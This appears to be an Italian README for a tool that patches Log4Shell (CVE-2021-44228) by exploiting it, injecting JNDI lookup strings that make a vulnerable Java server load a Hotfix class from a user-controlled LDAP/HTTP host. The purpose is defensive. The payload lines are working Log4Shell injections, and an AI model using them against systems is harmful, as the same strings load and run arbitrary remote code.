
Correggi a caldo CVE-2021-44228 sfruttando la vulnerabilità stessa.
Hot-patch per CVE-2021-44228 sfruttando la vulnerabilità stessa.
Inietta il seguente codice in qualsiasi punto probabilmente vulnerabile a CVE-2021-44228,
${jndi:ldap://your-own-server/patch}
Per prevenire attacchi MITM durante il processo di patch, si consiglia il seguente payload, ma con minore compatibilità per versioni precedenti di Java,
${jndi:ldap://your-own-server/any_string_except_patch}
Scarica l'ultima release
Specifica le variabili d'ambiente di sistema LOG4J_HOTFIX_HTTP_PATH e LOG4J_HOTFIX_HTTPS_PATH se vuoi ospitare Hotfix.class sul tuo server
Nota che Hotfix.java deve essere compilato con JDK6 per la massima compatibilità.